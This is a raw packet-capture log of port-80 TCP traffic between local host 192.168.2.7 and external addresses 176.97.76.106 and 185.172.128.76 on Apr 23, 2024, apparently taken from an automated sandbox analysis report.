Apr 23, 2024 09:43:14.109771013 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109776974 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.109802961 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109852076 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.109997988 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110012054 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110023022 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110034943 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110053062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110055923 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110064983 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110076904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110089064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110094070 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110100985 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110116959 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110129118 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110130072 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110141993 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110142946 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110150099 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110156059 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110168934 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110179901 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110193014 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110193968 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110204935 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110205889 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110219002 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110230923 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110233068 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110243082 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110255957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110268116 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110280991 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110285044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110297918 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110308886 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110316038 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110316038 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110321999 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110333920 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110347986 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110348940 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110359907 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110373020 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110384941 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110397100 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110399961 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110409975 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110413074 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110423088 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110424995 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110435009 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110449076 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110457897 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110465050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110485077 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110488892 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110502958 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110508919 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110516071 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110519886 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110527992 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110538960 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110551119 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110563040 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110563993 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110574961 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110575914 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110584974 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110596895 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110600948 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110609055 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110622883 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110622883 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110637903 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110637903 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110650063 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110661983 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110675097 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110677004 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110686064 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110697985 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110699892 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110709906 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110718012 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110723019 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110734940 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110735893 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110742092 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110748053 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110755920 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110766888 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110779047 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110781908 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110790014 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110801935 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110805988 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110814095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110819101 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110825062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110836983 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110851049 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.110862970 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.110876083 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.111133099 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.287713051 CEST	80	49703	185.172.128.76	192.168.2.7
Apr 23, 2024 09:43:14.341278076 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341294050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341308117 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341320038 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341331005 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341344118 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341413975 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.341456890 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341470957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341489077 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.341546059 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341567993 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.341656923 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341670036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341685057 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341696978 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341705084 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.341710091 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341721058 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341737032 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.341738939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341752052 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341763973 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341768026 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.341775894 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341788054 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341790915 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.341799974 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341811895 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341814995 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.341825962 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.341933966 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.341950893 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.342009068 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342025042 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342058897 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342093945 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342106104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342108965 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.342156887 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.342156887 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.342506886 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342577934 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342592001 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342603922 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342617035 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342636108 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342636108 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.342665911 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.342726946 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.342756033 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342767954 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342782021 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342794895 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342808008 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342822075 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342833996 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342844963 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342852116 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.342856884 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342871904 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.342871904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342885017 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342889071 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.342900038 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342912912 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342925072 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342937946 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342950106 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342967987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342981100 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.342992067 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343019009 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343070984 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343085051 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343096018 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343097925 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343111992 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343125105 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343126059 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343137980 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343139887 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343148947 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343163013 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343164921 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343174934 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343187094 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343198061 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343199968 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343209982 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343223095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343234062 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343234062 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343246937 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343247890 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343261003 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343261957 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343276024 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343291044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343303919 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343306065 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343317986 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343323946 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343329906 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343342066 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343353987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343362093 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343365908 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343378067 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343379974 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343389988 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343401909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343413115 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343425989 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343436956 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343436956 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343440056 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343456984 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343470097 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343471050 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343486071 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343498945 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343511105 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343523026 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343528032 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343534946 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343547106 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343559027 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343559980 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343571901 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343578100 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343585014 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343597889 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343610048 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343612909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343627930 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343640089 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343641043 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343658924 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343669891 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343682051 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343683958 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343693972 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343704939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343709946 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343709946 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343729973 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343741894 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343754053 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343758106 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343771935 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343787909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343796968 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343806982 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343820095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343822956 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343836069 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343844891 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343847990 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343859911 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343867064 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343873024 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343884945 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343887091 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343899965 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343914986 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343921900 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343935966 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343949080 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343951941 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343962908 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343975067 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.343975067 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.343987942 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344000101 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344012022 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344026089 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344027042 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344033957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344044924 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344044924 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344054937 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344058037 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344070911 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344086885 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344103098 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344110966 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344125032 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344126940 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344126940 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344141006 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344155073 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344166994 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344172001 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344178915 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344192028 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344197989 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344206095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344218969 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344229937 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344234943 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344244003 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344259977 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344273090 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344275951 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344275951 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344285011 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344296932 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344310045 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344311953 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344321966 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344332933 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344336987 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344346046 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344358921 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344358921 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344371080 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344383955 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344388008 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344394922 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:14.344397068 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344408989 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344425917 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344439030 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:14.344439983 CEST	49702	80	192.168.2.7	176.97.76.106
